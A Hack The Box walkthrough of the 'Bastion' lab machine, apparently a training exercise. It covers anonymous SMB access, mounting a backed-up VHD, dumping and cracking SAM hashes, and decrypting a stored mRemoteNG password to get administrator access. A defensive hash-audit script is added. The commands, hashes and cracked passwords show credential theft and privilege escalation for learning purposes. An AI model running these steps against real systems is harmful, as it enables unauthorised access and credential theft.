Bastion HTB
IP
10.10.10.134
Nmap
sudo nmap -sV -sC -A -oN nmap_results 10.10.10.134

Most likely Windows Server 2016
NetBIOS name BASTION\x00
Full port scan to make sure we don't miss anything
nmap -T5 -p- 10.10.10.134

Ports:
22: SSH
135: RPC
445: SMB
5985: Windows Remote Management (WinRM)
47001: Windows Remote Management listener
Let's start by enumerating SMB
SMB enumeration
Let's see if anonymous login is enabled
crackmapexec smb 10.10.10.134 -p anonymous -u anonymous --shares
We can use crackmapexec to check whether anonymous login is enabled and to list any shares.
It is enabled, and we have read access to the share Backups.

Let's access the share. For this we could use smbclient, but it's worth getting some extra practice using impacket.
impacket-smbclient anonymous:anonymous@10.10.10.134

Let's download note.txt and view the contents
get note.txt
Contents of note.txt

This is interesting: the other files within the share must be quite large, which is worth investigating. What we can do is mount the share and explore the contents.
First let's create a directory for the mount point
mkdir Backups
Now we can mount to the Backups share
sudo mount -t cifs -o username=anonymous //10.10.10.134/Backups Backups
Let's move into the Backups share and list its contents

Looking through WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 we see two virtual hard disk files.

Virtual Hard Disk (VHD) files are typically used to back up the data stored on a hard-disk partition. As such, the data stored in a .vhd file is very interesting, since it may contain sensitive information.
We do have two problems though:
We are working within a Linux environment, and we don't really want to set up a Windows VM just to read these files (it is an option, though, as VHD files are not the easiest to read in a Linux environment).
The VHD files are stored on a remote share; downloading them could take a large amount of time due to the size of the files.
But what we can do is use a tool called guestmount. First, we need to install the following.
sudo apt-get install libguestfs-tools
Let's create another mount point in our /mnt directory
sudo mkdir /mnt/vhd
Now we can use guestmount to mount the VHD from our Backups directory and view its contents.
sudo guestmount --add Backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
When we navigate to /mnt/vhd we can see we are in the C drive of the file system

What we can do is navigate over to the /Windows/System32/config directory and copy the SAM and SYSTEM files, as these are registry hives.
Why do we want the SAM and SYSTEM files? We want to dump hashes from the system:
the SAM file holds the encrypted user database
the SYSTEM file holds the boot key that encrypts the SAM database
If we happened to be on a domain controller we'd also want the NTDS file. For more information I highly recommend reading https://shahrukhiqbal24.medium.com/let-the-secrets-sync-in-the-dcsync-attack-7be80fdd9869
Dumping hashes
In our working directory we should now have both the SAM and SYSTEM files; we can use Impacket to dump the users' hashes offline.
impacket-secretsdump -sam SAM -system SYSTEM local

We have the following hashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
When looking at the Administrator's hash we can see it is blank: 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password, and aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password (i.e. LM hashing is disabled), so neither tells us anything. The only real NTLM hash we have is the one for the user L4mpje:
26112010952d963c8dc4217daec986d9
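As an added example (not part of the original writeup), the following script reviews a secretsdump-style SAM dump the way a defender auditing an exposed backup would: it flags accounts with empty passwords, accounts where LM hashing is still enabled, and real NT hashes that need rotating, and it parses the backup folder's timestamp so the dumped hash can be compared against an account's "Password last set" date. The sample lines are the three from the dump above; the LM-enabled line and the dates in the test are constructed.

```python
import re
from datetime import datetime

# Well-known constants: the LM and NT hashes of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM of "" (LM hashing disabled)
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # MD4 of "" in UTF-16LE

# secretsdump line format: user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):*$",
    re.IGNORECASE,
)

# Sample lines copied from the writeup's dump of the backed-up SAM.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""

def classify(line):
    """Return (user, rid, status) for one dump line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    lm, nt = m["lm"].lower(), m["nt"].lower()
    if nt == EMPTY_NT:
        status = "empty-password"      # account had no password when backed up
    elif lm != EMPTY_LM:
        status = "lm-hash-present"     # LM hashing enabled: trivially crackable
    else:
        status = "nt-hash-exposed"     # real hash leaked: rotate the password
    return m["user"], int(m["rid"]), status

def audit(dump):
    """Map every account in the dump to (rid, status)."""
    return {u: (rid, st) for u, rid, st in filter(None, map(classify, dump.splitlines()))}

def backup_time(folder):
    """Parse the timestamp in a Windows Backup folder name such as
    'Backup 2019-02-22 124351' (YYYY-MM-DD HHMMSS)."""
    m = re.search(r"Backup (\d{4}-\d{2}-\d{2}) (\d{6})", folder)
    return datetime.strptime(" ".join(m.groups()), "%Y-%m-%d %H%M%S")

def hash_is_stale(folder, password_last_set):
    """True when the password was changed (ISO 'YYYY-MM-DD HH:MM:SS') after the
    backup was taken, i.e. the dumped hash no longer matches the live account."""
    return datetime.fromisoformat(password_last_set) > backup_time(folder)

if __name__ == "__main__":
    for user, (rid, status) in audit(SAMPLE_DUMP).items():
        print(f"{user:<14} RID {rid:<5} {status}")
```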
What we can do is see if L4mpje has write access over the C$ share; if so, we can use psexec and get admin. To check, we can use smbmap
smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
-p is the user's LM:NT hash, as we are passing the hash rather than a password
But this does not seem to be the case: no write access to C$.

What we can do is crack the hash and see if we can SSH in.
First let's crack it, for this, we will use https://crackstation.net/

We have successfully cracked the hash
26112010952d963c8dc4217daec986d9: bureaulampje
Let's SSH into the machine
ssh L4mpje@10.10.10.134
Privilege escalation via L4mpje
First let's check the system information
We get an access denied; our privileges give us nothing special.

If we look at the administrators group we find something odd
net localgroup administrators

Administrator is the only member of the group, but as we recall from earlier the Administrator's hash in the backup was null (an empty password).
Let's look deeper into this
net user administrator

We can see the administrator has recently logged in.
Let's see when the SAM and SYSTEM files we copied were last updated.


We can see the administrator's last password change was well after the backed-up SAM and SYSTEM files were created, so the hash from the backup is stale.
So now we know there is indeed an administrator user on the system with a real password.
Let's navigate to the C:\ directory and work our way up from there.
When viewing the Program Files (x86) directory we can see an unusual program.

mRemoteNG is a tool to manage remote connections to other computer systems, which makes sense on a bastion host (jumpbox). Let's see if it could help us escalate our privileges.
The following article, https://ethicalhackingguru.com/how-to-exploit-remote-connection-managers/, explains how we can grab a password from
C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
If we look within the config file we do find the stored password, base64-encoded and encrypted.

We can use the following script to decrypt the base64-encoded password. mRemoteNG encrypts it with a key derived (salted, SHA1-based) from the application's master password, which is a well-known default unless the user changed it; that default is what makes the stored password recoverable.
Running the command (I did change the script's name, since I only copied and pasted it to my system)
python3 dc_mremote.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
Now we have the password! Let's SSH into the machine
ssh administrator@10.10.10.134
Woohoo, we are now the administrator
